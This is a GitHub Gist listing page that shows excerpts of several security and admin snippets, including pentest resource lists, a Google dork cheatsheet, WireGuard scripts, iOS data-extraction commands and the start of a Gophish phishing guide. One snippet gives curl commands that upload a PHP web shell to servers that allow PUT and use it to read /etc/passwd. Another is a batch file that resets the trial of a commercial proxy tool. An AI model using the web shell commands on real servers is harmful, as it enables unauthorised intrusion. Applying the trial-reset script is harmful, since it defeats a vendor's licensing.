Skip to content

Instantly share code, notes, and snippets.

View db8d9's full-sized avatar

db8d9

View GitHub Profile
@BaRRaKudaRain
BaRRaKudaRain / ToolBox.sh
Last active March 15, 2024 00:47
This script will download some tools for pentesting
#!/bin/bash
echo " ______ ______ ______ __ ______ ______ __ __ ______ __ __
/\__ _\ /\ __ \ /\ __ \ /\ \ /\ == \ /\ __ \ /\_\_\_\ /\ ___\ /\ \_\ \
\/_/\ \/ \ \ \/\ \ \ \ \/\ \ \ \ \____ \ \ __< \ \ \/\ \ \/_/\_\/_ \ \___ \ \ \ __ \
\ \_\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ /\_\/\_\ \/\_____\ \ \_\ \_\
\/_/ \/_____/ \/_____/ \/_____/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/_/\/_/ "
echo ""
echo ""
@heywoodlh
heywoodlh / maderas.txt
Created June 19, 2019 15:47
Clone of the arsenal, armory & library by Maderas (@hackermaderas) -- https://pastebin.com/v8Mr2k95
The arsenal, armory & library by Maderas (@hackermaderas, #CyberpunkisNow) 6/8/2019
Original / 1st version here: https://pastebin.com/rMw4WbhX
___________________________________________________________________________________
# Basic knowledge requirements for Red Teaming, PenTesting, Hacking & Cybersecurity
# These are the basic competencies expected (and tested for during the in-person technical interview) by one of the largest, most visible InfoSec companies # on Earth.
@sundowndev
sundowndev / GoogleDorking.md
Last active April 29, 2025 06:30
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@teixeira0xfffff
teixeira0xfffff / resources.bin
Created June 2, 2019 22:52
Redteam/Pentesting/Hacking/Cybersecurity/OSINT Resources
++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:
Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)
Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports
Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP mainta
@heywoodlh
heywoodlh / wg-client-gen.sh
Created February 2, 2019 17:00
Wireguard scripts
#!/usr/bin/env bash
echo "Assigned VPN Client IP address: "
read CLIENT_IP
echo ''
echo "Client private key: "
read CLIENT_PRIVATE_KEY
echo ''
@dagli
dagli / proxifier_trial_reset.bat
Last active March 24, 2025 06:46
Proxifier Trial Reset
REM Initex Software Proxifiertrial reset
REM Close Proxifier if it is running
taskkill /f /im Proxifier.exe
reg delete "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main" /v DefaultWANProfile /f
reg delete "HKCU\Software\Initex\ProxyChecker\Settings" /v DefaultWANProfile /f
reg delete "HKCU\Software\Initex\Proxifier\Settings" /v DefaultWANProfile /f
REM Delete "DefaultWANProfile" line in "Settings.ini" file in ProxifierPE folder (for Portable Edition)
del %~dp0Settings.old.ini
@iddoeldor
iddoeldor / ios_ssh_over_usb_and_ipa_extractor.md
Last active June 4, 2024 18:10
and iOS related tips&tricks

extract db

PASS=alpine; PORT=2222; sshpass -p $PASS ssh -p $PORT root@localhost -t "cp \$(find /var/mobile/Containers/Data/Application/ -name s4l*db) /private/var/tmp/skype.db" && sshpass -p $PASS scp -P $PORT root@localhost:/private/var/tmp/skype.db .

pull & read plist

/tmp$ scp -P 2222 root@localhost:/private/var/mobile/Containers/Data/Application/F8C7294C-2B60-48EC-A987-D46B9FE4DEAE/Library/Preferences/com.skype.skype.plist .
/tmp$ sudo apt-get install libplist-utils
/tmp$ plistutil -i com.skype.skype.plist | less
@alexandercastillo1
alexandercastillo1 / PlayingWithWebsitesThatWorks.txt
Created August 11, 2018 15:14
PlayingWithWebsitesThatWorks
Check PUT options for a bunch of web links
curl -v -X OPTIONS $(cat /root/Desktop/bunchoflinks.txt)
Check PUT options for a web link
curl -v -X OPTIONS http://link/sublink
Inject backdoor on PUT
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://link/sublink/backdoor.php
calling backdoor
http://link/sublink/backdoor.php?cmd=cat%/etc/passwd
@ay65535
ay65535 / after_cleaninstall.md
Last active May 31, 2024 22:46
useful commands that can be used after clean installation of Windows 10 
# Change network profile
$privNwIfIdx = Get-NetConnectionProfile | Where-Object -Property Name -like 'eoRT*' | Select-Object -ExpandProperty 'InterfaceIndex'
Set-NetConnectionProfile -InterfaceIndex $privNwIfIdx -NetworkCategory Private
start ms-settings:about
@ozzi-
ozzi- / Red Team Phishing with Gophish.md
Last active January 16, 2025 15:46

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+